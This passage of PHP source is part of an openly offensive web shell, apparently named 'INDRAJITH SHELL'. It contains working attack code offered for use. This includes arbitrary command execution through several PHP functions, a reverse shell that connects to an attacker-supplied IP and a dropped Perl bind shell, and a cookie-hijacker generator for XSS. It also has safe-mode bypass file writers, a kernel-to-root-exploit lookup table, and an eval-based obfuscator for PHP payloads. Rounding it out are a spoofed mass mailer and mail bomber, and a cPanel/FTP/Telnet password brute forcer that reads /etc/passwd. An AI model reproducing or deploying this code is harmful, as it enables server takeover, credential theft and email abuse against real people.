  627.     echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=".$_GET['copy']." > To : <input size=40 name='c_target' value=".$_GET['path'].$sep."> Name : <input name='cn_name'><input type='submit' value='   >>   ' /></form></table><br /><br /><hr /><br /><br /><br /></center></div>";
  628. }
  629. function copy_file_bg()
  630. {
  631.     global $sep;
  632.     if(function_exists(copy))
  633.     {
  634.         if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name']))
  635.         {
  636.             alert("Succeded");
  637.         }
  638.         else
  639.         {
  640.             alert("Access Denied");
  641.         }
  642.     }
  643. }
  644. function ch_perm_bg()
  645. {
  646.     if(isset($_GET['p_filex']) && isset($_GET['new_perm']))
  647.     {
  648.         if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE)
  649.         {
  650.             alert("Succeded. Permission Changed!!!");
  651.         }
  652.         else
  653.         {
  654.             alert("Access Denied for This Operation");
  655.         }
  656.     }
  657. }
  658. function ch_perm_ui()
  659. {
  660.     $p_file=$_GET['perm'];
  661.     echo "<div id =result><center><h2>New Permission</h2><hr /><p><form method='GET'><input type='hidden' name='path' value=".getcwd()." ><input name='p_filex' type=hidden value={$p_file} >New Permission : <input name='new_perm' isze='40' value=0".substr(sprintf('%o', fileperms($p_file)), -3)."><input type='submit' value='   >>   ' /></form></p><p>Full Access : <font color=red>755</font><br />Notice : <font color=red>Don't use Unix Access like 777, 666, etc. Use 755, 655, etc</p><br /><br /><hr /><br /><br /></center></div>";
  662.     ch_perm_bg();
  663. }
  664. function mk_file_ui()
  665. {
  666.     chdir($_GET['path']);
  667.     echo "<div id=result><br /><br /><font color=red><form method='GET'>
  668.          <input type='hidden' name='path' value=".getcwd().">
  669.          New File Name : <input size='40' name='new_f_name' value=".$_GET['new_file']."></font><br /><br /><hr /><br /><center>
  670.          <textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr />
  671.          <input class='input_big' type='submit' value='  Save  ' /></form></center></div>";
  672. }
  673. function mk_file_bg()
  674. {
  675.     chdir($_GET['path']);
  676.     $c_path=$_GET['path'];
  677.     $c_file=$_GET['new_f_name'];
  678.     $c_file_contents=$_GET['n_file_content'];
  679.     $handle=fopen($c_file, "w");
  680.     if(!$handle)
  681.     {
  682.         alert("Permission Denied");
  683.     }
  684.     else
  685.     {
  686.         fwrite($handle,$c_file_contents);
  687.         alert("Your changes were Successfully Saved!");
  688.     }
  689.     fclose($handle);
  690. }
  691. function create_dir()
  692. {
  693.     chdir($_GET['path']);
  694.     $new_dir=$_GET['new_dir'];
  695.     if(is_writable($_GET['path']))
  696.     {
  697.         mkdir($new_dir);
  698.         alert("Direcory Created Successfully");
  699.         exit;
  700.     }
  701.     else
  702.     {
  703.         alert("Access Denied for this Operation");
  704.         exit;
  705.     }
  706. }
  707. function cmd($cmd)
  708. {
  709.     chdir($_GET['path']);
  710.     $res="";
  711.     if($_GET['cmdexe'])
  712.     {
  713.         $cmd=$_GET['cmdexe'];
  714.     }
  715.     if(function_exists('shell_exec'))
  716.     {
  717.         $res=shell_exec($cmd);
  718.     }
  719.     else if(function_exists('exec'))
  720.     {
  721.         exec($cmd,$res);
  722.         $res=join("\n",$res);
  723.     }
  724.     else if(function_exists('system'))
  725.     {
  726.         ob_start();
  727.         system($cmd);
  728.         $res = ob_get_contents();
  729.         ob_end_clean();  
  730.     }
  731.     elseif(function_exists('passthru'))
  732.     {
  733.     ob_start();
  734.     passthru($cmd);
  735.     $res=ob_get_contents();
  736.     ob_end_clean();
  737.     }
  738.     else if(function_exists('proc_open'))
  739.     {
  740.         $descriptorspec = array(0 => array("pipe", "r"),  1 => array("pipe", "w"),  2 => array("pipe", "w"));
  741.         $handle = proc_open($cmd ,$descriptorspec , $pipes);
  742.         if(is_resource($handle))
  743.         {
  744.             if(function_exists('fread') && function_exists('feof'))
  745.             {
  746.                 while(!feof($pipes[1]))
  747.                 {
  748.                     $res .= fread($pipes[1], 512);
  749.                 }
  750.             }
  751.             else if(function_exists('fgets') && function_exists('feof'))
  752.             {
  753.                 while(!feof($pipes[1]))
  754.                 {
  755.                     $res .= fgets($pipes[1],512);
  756.                 }
  757.             }
  758.         }
  759.         pclose($handle);
  760.     }
  761.    
  762.     else if(function_exists('popen'))
  763.     {
  764.         $handle = popen($cmd , "r");
  765.         if(is_resource($handle))
  766.         {
  767.             if(function_exists('fread') && function_exists('feof'))
  768.             {
  769.                 while(!feof($handle))
  770.                 {
  771.                     $res .= fread($handle, 512);
  772.                 }
  773.             }
  774.             else if(function_exists('fgets') && function_exists('feof'))
  775.             {
  776.                 while(!feof($handle))
  777.                 {
  778.                     $res .= fgets($handle,512);
  779.                 }
  780.             }
  781.         }
  782.         pclose($handle);
  783.     }
  784.    
  785.     $res=wordwrap(htmlspecialchars($res));
  786.     if($_GET['cmdexe'])
  787.     {
  788.         echo "<div id=result><center><font color=green><h2>r00t@TOF:~#</h2></center><hr /><pre>".$res."</font></pre></div>";
  789.     }
  790.     return $res;
  791. }
  792. function upload_file()
  793. {
  794.     chdir($_POST['path']);
  795.     if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name']))
  796.     {
  797.         alert("Uploaded File Successfully");
  798.     }
  799.     else
  800.     {
  801.         alert("Access Denied!!!");
  802.     }
  803. }
  804.  
  805. function reverse_conn_ui()
  806. {
  807.     global $your_ip;
  808.     echo "<div id='result'>
  809.          <center><h2>Reverse Shell</h2><hr />
  810.          <br /><br /><form method='GET'><table class=tbl>
  811.          <tr>
  812.          <td><select name='rev_option' style='color:green; background-color:black; border:1px solid #666;'>
  813.                      <option>PHP Reverse Shell</option>
  814.                      <option>PERL Bind Shell</option>
  815.          </select></td></tr><tr>
  816.          <td>Your IP : <input name='my_ip' value=".$your_ip.">
  817.          PORT : <input name='my_port' value='560'>
  818.          <input type='submit' value='   >>   ' /></td></tr></form>
  819.          <tr></tr>
  820.          <tr><td><font color=red>PHP Reverse Shell</font> : <font color=green> nc -l -p <i>port</i></font></td></tr><tr><td><font color=red>PERL Bind Shell</font> : <font color=green> nc <i>server_ip port</i></font></td></tr></table> </div>";
  821. }
  822. function reverse_conn_bg()
  823. {
  824.     global $os;
  825.     $option=$_REQUEST['rev_option'];
  826.     $ip=$_GET['my_ip'];
  827.     $port=$_GET['my_port'];
  828.     if($option=="PHP Reverse Shell")
  829.     {
  830.         echo "<div id=result><h2>RESULT</h2><hr /><br />";
  831.         function printit ($string)
  832.         {
  833.             if (!$daemon)
  834.             {
  835.         print "$string\n";
  836.             }
  837.         }
  838.         $chunk_size = 1400;
  839.         $write_a = null;
  840.         $error_a = null;
  841.         $shell = 'uname -a; w; id; /bin/sh -i';
  842.         $daemon = 0;
  843.         $debug = 0;
  844.         if (function_exists('pcntl_fork'))
  845.         {
  846.             $pid = pcntl_fork();
  847.             if ($pid == -1)
  848.             {
  849.         printit("ERROR: Can't fork");
  850.         exit(1);
  851.             }
  852.             if ($pid)
  853.             {
  854.         exit(0);
  855.             }
  856.             if (posix_setsid() == -1)
  857.             {
  858.         printit("Error: Can't setsid()");
  859.         exit(1);
  860.             }
  861.             $daemon = 1;
  862.         }
  863.         else
  864.         {
  865.             printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
  866.         }
  867.         chdir("/");
  868.         umask(0);
  869.         $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  870.         if (!$sock)
  871.         {
  872.             printit("$errstr ($errno)");
  873.             exit(1);
  874.         }
  875.         $descriptorspec = array(0 => array("pipe", "r"),  1 => array("pipe", "w"),  2 => array("pipe", "w"));
  876.         $process = proc_open($shell, $descriptorspec, $pipes);
  877.         if (!is_resource($process))
  878.         {
  879.             printit("ERROR: Can't spawn shell");
  880.             exit(1);
  881.         }
  882.         stream_set_blocking($pipes[0], 0);
  883.         stream_set_blocking($pipes[1], 0);
  884.         stream_set_blocking($pipes[2], 0);
  885.         stream_set_blocking($sock, 0);
  886.         printit("<font color=green>Successfully opened reverse shell to $ip:$port </font>");
  887.         while (1)
  888.         {
  889.             if (feof($sock))
  890.             {
  891.         printit("ERROR: Shell connection terminated");
  892.         break;
  893.             }
  894.             if (feof($pipes[1]))
  895.             {
  896.         printit("ERROR: Shell process terminated");
  897.         break;
  898.             }
  899.             $read_a = array($sock, $pipes[1], $pipes[2]);
  900.             $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  901.             if (in_array($sock, $read_a))
  902.             {
  903.         if ($debug) printit("SOCK READ");
  904.         $input = fread($sock, $chunk_size);
  905.         if ($debug) printit("SOCK: $input");
  906.         fwrite($pipes[0], $input);
  907.             }
  908.             if (in_array($pipes[1], $read_a))
  909.             {
  910.         if ($debug) printit("STDOUT READ");
  911.         $input = fread($pipes[1], $chunk_size);
  912.         if ($debug) printit("STDOUT: $input");
  913.         fwrite($sock, $input);
  914.             }
  915.             if (in_array($pipes[2], $read_a))
  916.             {
  917.         if ($debug) printit("STDERR READ");
  918.         $input = fread($pipes[2], $chunk_size);
  919.         if ($debug) printit("STDERR: $input");
  920.         fwrite($sock, $input);
  921.             }
  922.         }
  923.         fclose($sock);
  924.         fclose($pipes[0]);
  925.         fclose($pipes[1]);
  926.         fclose($pipes[2]);
  927.         proc_close($process);
  928.         echo "<br /><br /><hr /><br /><br /></div>";
  929.     }
  930.     else if($option=="PERL Bind Shell")
  931.     {
  932.         global $bind_perl, $os;
  933.         $pbfl=$bind_perl;
  934.         $handlr=fopen("indrajith_perl_bind.pl", "wb");
  935.         if($handlr)
  936.         {
  937.             fwrite($handlr, gzinflate(base64_decode($bind_perl)));
  938.         }
  939.         else
  940.         {
  941.             alert("Access Denied for create new file");
  942.         }
  943.         fclose($handlr);
  944.         if(file_exists("indrajith_perl_bind.pl"))
  945.         {
  946.             if($os=="nix")
  947.             {
  948.                 cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl $port");
  949.             }
  950.             else
  951.             {
  952.                 cmd("perl indrajith_perl_bind.pl $port");
  953.             }
  954.         }
  955.     }
  956. }
  957.  
  958. function cookie_jack()
  959. {
  960.     global $cookie_highjacker;
  961.     echo "<div id=result><center><h2>NOTICE</h2><hr/>";
  962.     if(function_exists('fopen') && function_exists('fwrite'))
  963.     {
  964.         $cook=gzinflate(base64_decode($cookie_highjacker));
  965.         $han_le=fopen("jith_cookie.php", "w+");
  966.         if($han_le)
  967.         {
  968.             fwrite($han_le, $cook);
  969.             echo "Yes... Cookie highjacker is generated.<br /> Name : <a style='color:green;' target=_blank href=jith_cookie.php>jith_cookie.php</a></font>.<br /> Rename it as 404.php or what you like and highjack cookie of your target.<br />It is usefull in XSS<br />It will make a file <font color=red>configuration.txt</font> in this direcory and save the cookie value in it. :p cheers...<br /><br /><hr /><br /><br /></center></div>";
  970.         }
  971.         else
  972.         {
  973.             echo "<font color=red>Sorry... Generate COOKIE HIGHJACKER failed<br /><br /><hr /><br /><br /></center></div>";
  974.         }
  975.     }
  976. }
  977.  
  978.  
  979.  
  980. function safe_mode_fuck()
  981. {
  982.     global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php;
  983.     $path = chdir($_GET['path']);
  984.     chdir($_GET['path']);
  985.     switch($_GET['safe_mode'])
  986.     {
  987.         case "s_php_ini":
  988.             $s_file=$s_php_ini;
  989.             $s_name="php.ini";
  990.             break;
  991.         case "s_htaccess":
  992.             $s_name=".htaccess";
  993.             $s_file=$s_htaccess;
  994.             break;
  995.         case "s_htaccess_pl":
  996.             $s_name=".htaccess";
  997.             $s_file=$s_htaccess_pl;
  998.             break;
  999.         case "s_ini_php":
  1000.             $s_name="ini.php";
  1001.             $s_file=$ini_php;
  1002.             break;
  1003.            
  1004.     }
  1005.     if(function_exists('fopen')&& function_exists('fwrite'))
  1006.     {
  1007.         $s_handle=fopen("$s_name", "w+");
  1008.         if($s_handle)
  1009.         {
  1010.             fwrite($s_handle, $s_file);
  1011.             alert("Operation Succeed!!!");
  1012.         }
  1013.         else
  1014.         {
  1015.             alert("Access Denied!!!");
  1016.         }
  1017.         fclose($s_handle);
  1018.     }
  1019. }
  1020. function safe_mode_fuck_ui()
  1021. {
  1022.     global $path;
  1023.     $path=getcwd();
  1024.     echo "<div id=result><br /><center><h2>Select Your Options</h2><hr />
  1025.    <table class=tbl size=10><tr><td><a href=?path={$path}&amp;safe_mode=s_php_ini>PHP.INI</a></td><td><a href=?path={$path}&amp;safe_mode=s_htaccess>.HTACCESS</a></td><td><a href=?path={$path}&amp;safe_mode=s_htaccess_pl>.HTACCESS(perl)</td><td><a href=?path={$path}&amp;safe_mode=s_ini_php>INI.PHP</td></tr></table><br /><br /></div>";
  1026. }
  1027.  
  1028.  
  1029. function AccessDenied()
  1030. {
  1031.     global $path, $forbid_dir;
  1032.     $path=$_GET['path'];
  1033.     chdir($path);
  1034.     if(function_exists('fopen') && function_exists('fwrite'))
  1035.     {
  1036.         $forbid=fopen(".htaccess", "wb");
  1037.         if($forbid)
  1038.         {
  1039.             fwrite($forbid, $forbid_dir);
  1040.             alert("Opreation Succeeded");
  1041.         }
  1042.         else
  1043.         {
  1044.             alert("Access Denied");
  1045.         }
  1046.         fclose($forbid);
  1047.     }
  1048. }
  1049.  
  1050. function r00t_exploit()
  1051. {
  1052.     $kernel = php_uname();
  1053.     $r00t_db = array('2.6.19'=>'jessica','2.6.20'=>'jessica','2.6.21'=>'jessica','2.6.22'=>'jessica','2.6.23'=>'jessica, vmsplice','2.6.24'=>'jessica, vmspice','2.6.31'=>'enlightment','2.6.18'=>'brk, ptrace, kmod, brk2','2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip,ptrace');
  1054.     foreach($r00t_db as $kern=>$exp)
  1055.     {
  1056.         if(strstr($kernel, $kern))
  1057.         {
  1058.             return $exp;
  1059.         }
  1060.     else
  1061.         {
  1062.             $exp='<font color="red">Not found.</font>';
  1063.             return $exp;
  1064.         }
  1065.     }
  1066. }
  1067.  
  1068. function php_ende_ui()
  1069. {
  1070.     echo "<div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr /><form method='post'><table class=tbl>
  1071.    <tr><td>
  1072.    Method : <select name='typed' style='color:green; background-color:black; border:1px solid #666;'><option>Encode</option><option>Decode</decode></select> TYPE : <select name='typenc' style='color:green; background-color:black; border:1px solid #666;'><option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>
  1073.    </td><tr><td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'>INPUT YOUR CONTENT TO ENCODE/DECODE
  1074.  
  1075. For Encode Input your full source code.
  1076.  
  1077. For Decode Input the encoded part only.</textarea></tr></td></table><hr /><input class='input_big' type='submit' value='   >>   ' /><br /><hr /><br /><br /></form></div>";
  1078. }
  1079. function php_ende_bg()
  1080. {
  1081.     $meth_d=$_POST['typed'];
  1082.     $typ_d=$_POST['typenc'];
  1083.     $c_ntent=$_POST['php_content'];
  1084.     $c_ntent=$c_ntent;
  1085.     switch($meth_d)
  1086.     {
  1087.         case "Encode":
  1088.             switch($typ_d)
  1089.             {
  1090.                 case "GZINFLATE":
  1091.                     $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1092.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
  1093.                     break;
  1094.                 case "GZUNCOMPRESS":
  1095.                     $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1096.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
  1097.                     break;
  1098.                 case "STR_ROT13":
  1099.                     $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>');
  1100.                     $res_t=base64_encode(str_rot13($res_t));
  1101.                     $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
  1102.                     break;                  
  1103.             }
  1104.         break;
  1105.         case "Decode":
  1106.             switch($typ_d)
  1107.             {
  1108.                 case "GZINFLATE":
  1109.                     $res_t=gzinflate(base64_decode($c_ntent));
  1110.                     break;
  1111.                 case "GZUNCOMPRESS":
  1112.                     $res_t=gzuncompress(base64_decode($c_ntent));
  1113.                     break;
  1114.                 case "STR_ROT13":
  1115.                     $res_t=str_rot13(base64_decode($c_ntent));
  1116.                     break;                  
  1117.             }
  1118.         break;
  1119.     }
  1120.     echo "<div id=result><center><h2>INDRAJITH SHELL</h2><hr /><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";
  1121. }
  1122.  
  1123. function massmailer_ui()
  1124. {
  1125.     echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr /><table class=tbl width=40 style='col-width:40'><td><table class=tbl><tr style='float:left;'><td><font color=green size=4>Mass Mail</font></td></tr><form method='POST'><tr style='float:left;'><td> FROM : </td><td><input name='from' size=40 value='ajithkp560@fbi.gov'></td></tr><tr  style='float:left;'><td>TO :</td><td><input size=40 name='to_mail' value='ajithkp560@gmail.com,ajithkp560@yahoo.com'></td></tr><tr  style='float:left;'><td>Subject :</td><td><input size=40 name='subject_mail' value='Hi, GuyZ'></td></tr><tr style='float:left;'><td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing massmail :p</textarea></td><td><input class='input_big' type='submit' value='   >>   '></td></tr></form></table></td>
  1126.    <form method='post'><td> <table class='tbl'><td><font color=green size=4>Mail Bomber</font></td></tr><tr style='float:left;'><td>TO : </td><td><input size=40 name='bomb_to' value='ajithkp560@gmail.com,ajithkp560_mail_bomb@fbi.gov'></td></tr><tr style='float:left;'><td>Subject : </td><td><input size=40 name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'><td>No. of times</td><td><input size=40 name='bomb_no' value='100'></td></tr><tr style='float:left;'><td> <textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content'>I'm doing  E-Mail Bombing :p</textarea> </td><td><input class='input_big' type='submit' value='   >>   '></td></tr></form></table>   </td></tr></table>";
  1127. }
  1128.  
  1129. function massmailer_bg()
  1130. {
  1131.     $from=$_POST['from'];
  1132.     $to=$_POST['to_mail'];
  1133.     $subject=$_POST['subject_mail'];
  1134.     $message=$_POST['mail_content'];
  1135.     if(function_exists('mail'))
  1136.     {
  1137.         if(mail($to,$subject,$message,"From:$from"))
  1138.         {
  1139.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Send... :p</font><br /><br /><hr /><br /><br />";
  1140.         }
  1141.         else
  1142.         {
  1143.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1144.         }
  1145.     }
  1146.     else
  1147.     {
  1148.         echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1149.     }
  1150. }
  1151.  
  1152. function mailbomb_bg()
  1153. {
  1154.     $rand=rand(0, 9999999);
  1155.     $to=$_POST['bomb_to'];
  1156.     $from="president_$rand@whitewhitehouse.gov";
  1157.     $subject=$_POST['bomb_subject']." ID ".$rand;
  1158.     $times=$_POST['bomb_no'];
  1159.     $content=$_POST['bmail_content'];
  1160.     if($times=='')
  1161.     {
  1162.         $times=1000;
  1163.     }
  1164.     while($times--)
  1165.     {
  1166.         if(function_exists('mail'))
  1167.         {
  1168.             if(mail($to,$subject,$message,"From:$from"))
  1169.             {
  1170.                 echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Bombed... :p</font><br /><br /><hr /><br /><br />";
  1171.             }
  1172.             else
  1173.             {
  1174.                 echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1175.             }
  1176.         }
  1177.         else
  1178.         {
  1179.             echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1180.         }
  1181.     }
  1182. }
  1183. /* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/
  1184. /*------------------------ Credit Goes to Them ---------------------------------*/
  1185. function cpanel_check($host,$user,$pass,$timeout)
  1186. {
  1187.     set_time_limit(0);
  1188.     global $cpanel_port;
  1189.     $ch = curl_init();
  1190.     curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
  1191.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1192.     curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1193.     curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1194.     curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1195.     curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1196.     $data = curl_exec($ch);
  1197.     if ( curl_errno($ch) == 28 )
  1198.     {
  1199.         print "<b><font color=orange>Error :</font> <font color=red>Connection Timeout. Please Check The Target Hostname .</font></b>";
  1200.         exit;
  1201.     }
  1202.     else if (curl_errno($ch) == 0 )
  1203.     {
  1204.         print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"orange\">[~]</font></b><font face=\"Tahoma\"   style=\"font-size: 9pt\"><b><font color=\"green\">
  1205.        Cracking Success With Username &quot;</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  1206.     }
  1207.     curl_close($ch);
  1208. }
  1209.  
  1210. function cpanel_crack()
  1211. {
  1212.     set_time_limit(0);
  1213.     global $os;
  1214.     echo "<div id=result>";
  1215.     $cpanel_port="2082";
  1216.         $connect_timeout=5;
  1217.         if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype']))
  1218.         {
  1219.         ?>
  1220.         <center>
  1221.         <form method=post>
  1222.         <table class=tbl>
  1223.             <tr>
  1224.                 <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
  1225.             </tr>
  1226.             <tr>
  1227.                 <td align=center>User names</td><td align=center>Password</td>
  1228.             </tr>
  1229.             <tr>
  1230.                 <td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php
  1231.                 if($os != "win")
  1232.                 {
  1233.                     if(@file('/etc/passwd'))
  1234.                     {
  1235.                         $users = file('/etc/passwd');
  1236.                         foreach($users as $user)
  1237.                         {
  1238.                             $user = explode(':', $user);
  1239.                             echo $user[0] . "\n";
  1240.                         }
  1241.                     }
  1242.                     else
  1243.                     {
  1244.                         $temp = "";
  1245.                         $val1 = 0;
  1246.                         $val2 = 1000;
  1247.                         for(;$val1 <= $val2;$val1++)
  1248.                         {
  1249.                             $uid = @posix_getpwuid($val1);
  1250.                             if ($uid)
  1251.                                  $temp .= join(':',$uid)."\n";
  1252.                          }
  1253.                        
  1254.                          $temp = trim($temp);
  1255.                              
  1256.                          if($file5 = fopen("test.txt","w"))
  1257.                          {
  1258.                             fputs($file5,$temp);
  1259.                              fclose($file5);
  1260.                              
  1261.                              $file = fopen("test.txt", "r");
  1262.                              while(!feof($file))
  1263.                              {
  1264.                                 $s = fgets($file);
  1265.                                 $matches = array();
  1266.                                 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1267.                                 $matches = str_replace("home/","",$matches[1]);
  1268.                                 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1269.                                     continue;
  1270.                                 echo $matches;
  1271.                             }
  1272.                             fclose($file);
  1273.                         }
  1274.                     }
  1275.                 }
  1276.                  ?></textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td>
  1277.             </tr>
  1278.             <tr>
  1279.                 <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
  1280.             </tr>
  1281.             <tr>
  1282.                 <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
  1283.             </tr>
  1284.             <tr>
  1285.                 <td align=center colspan=2><input type="submit" value="   Go    " class=but></td>
  1286.             </tr>
  1287.         </table>
  1288.         </form>
  1289.         </center>
  1290.         <?php
  1291.         }
  1292.         else
  1293.         {
  1294.             if(empty($_POST['username']) || empty($_POST['password']))
  1295.                 echo "<center>Please Enter The Users or Password List</center>";
  1296.             else
  1297.             {
  1298.                 $userlist=explode("\n",$_POST['username']);
  1299.                 $passlist=explode("\n",$_POST['password']);
  1300.    
  1301.                 if($_POST['cracktype'] == "ftp")
  1302.                 {
  1303.                     foreach ($userlist as $user)
  1304.                     {
  1305.                         $pureuser = trim($user);
  1306.                         foreach ($passlist as $password )
  1307.                         {
  1308.                             $purepass = trim($password);
  1309.                             ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1310.                         }
  1311.                     }
  1312.                 }
  1313.                 if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
  1314.                 {
  1315.                     if($cracktype == "telnet")
  1316.                     {
  1317.                         $cpanel_port="23";
  1318.                     }
  1319.                     else
  1320.                         $cpanel_port="2082";
  1321.                     foreach ($userlist as $user)
  1322.                     {
  1323.                         $pureuser = trim($user);
  1324.                         echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
  1325.                         Processing user $pureuser ...</font></b><br><br>";
  1326.                         foreach ($passlist as $password )
  1327.                         {
  1328.                             $purepass = trim($password);
  1329.                             cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1330.                         }
  1331.                     }
  1332.                 }
  1333.             }
  1334.         }
  1335.                
  1336.     echo "</div>";
  1337. }
  1338.  
  1339. function get_users()
  1340. {
  1341.     $userz = array();
  1342.     $user = file("/etc/passwd");
  1343.     foreach($user as $userx=>$usersz)
  1344.     {
  1345.             $userct = explode(":",$usersz);
  1346.             array_push($userz,$userct[0]);
  1347.     }
  1348.     if(!$user)
  1349.     {
  1350.         if($opd = opendir("/home/"))
  1351.         {
  1352.             while(($file = readdir($opd))!== false)
  1353.             {
  1354.                 array_push($userz,$file);
  1355.             }
  1356.         }
  1357.         closedir($opd);
  1358.     }
  1359.     $userz=implode(', ',$userz);
  1360.     return $userz;
  1361. }
  1362.  
  1363. function exploit_details()
  1364. {
  1365.     global $os;
  1366.     echo "<div id=result style='color:green;'><center>
  1367.    <h2>Exploit Server Details</h2><hr /><br /><br /><table class=table style='color:green;text-align:center'><tr><td>
  1368.    OS: <a style='color:7171C6;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr>
  1369.    <tr><td>PHP Version : <a style='color:7171C6;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr>
  1370.    <tr><td>Kernel Release : <font color=7171C6>".php_uname(r)."</font></td></tr>
  1371.    <tr><td>Kernel Version : <font color=7171C6>".php_uname(v)."</font></td></td>
  1372.    <tr><td>Machine : <font color=7171C6>".php_uname(m)."</font></td</tr>
